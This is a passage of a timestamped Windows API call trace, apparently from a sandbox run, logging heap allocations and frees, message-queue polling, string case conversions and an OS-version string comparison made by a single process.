(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0164.738] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0164.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0164.738] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0164.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0164.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0164.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0164.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0164.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0164.739] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0164.739] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0164.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0164.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0164.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0164.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0164.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0164.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.740] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0164.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.742] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0164.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0164.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0164.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0164.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.743] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0164.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0164.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0164.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0164.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0164.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0164.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.744] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0164.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0164.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0164.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0164.744] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0164.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0164.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0164.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0164.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0164.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0164.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0164.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0164.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0164.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0164.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0164.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0164.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0164.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0164.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0164.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0164.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.746] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0164.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0164.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0164.746] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0164.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0164.746] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0164.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0164.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.747] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0164.747] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0164.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0164.747] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0164.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0164.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0164.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0164.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0164.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0164.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0164.751] HeapFree (in: 